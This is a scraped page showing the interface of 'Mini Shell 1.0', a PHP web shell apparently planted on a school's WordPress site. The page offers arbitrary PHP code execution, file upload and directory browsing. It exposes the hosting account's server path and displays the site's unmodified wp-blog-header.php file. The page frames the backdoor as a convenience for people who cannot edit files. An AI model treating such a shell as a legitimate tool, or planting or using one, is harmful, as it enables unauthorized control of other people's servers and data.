HOME


Mini Shell 1.0
PHP Code Editor

Enter PHP Code

This is a solution for those who cannot edit or upload files.













Liceo María Zambrano

Cultura y Empleo

DIR: /home/u364603330/domains/liceomariazambrano.org/public_html/
Upload File :
Current File : /home/u364603330/domains/liceomariazambrano.org/public_html/wp-blog-header.php
<?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}